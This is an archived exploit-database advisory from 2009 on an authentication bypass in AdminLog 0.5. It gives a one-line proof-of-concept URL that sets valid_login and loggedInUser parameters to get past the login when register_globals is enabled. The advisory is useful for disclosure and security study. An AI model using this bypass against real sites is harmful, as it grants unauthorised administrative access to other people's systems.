AdminLog 0.5 (valid_login) Authentication Bypass Vulnerability
SEBUG-ID:11751
Published:2009-07-02
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
#########################################################################
[+] AdminLog 0.5 Login Bypass Vulnerability
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
[+] down: http://www.manlyfamily.net/wiki/doku.php?id=programming:php:adminlog
#########################################################################
[+] Login Bypass
- Conditions : register_globals = ON
- PoC
http://127.0.0.1/[path]/adminlog.php?valid_login=1&loggedInUser=[VALIDUSER]
#########################################################################// sebug.net [2009-07-03]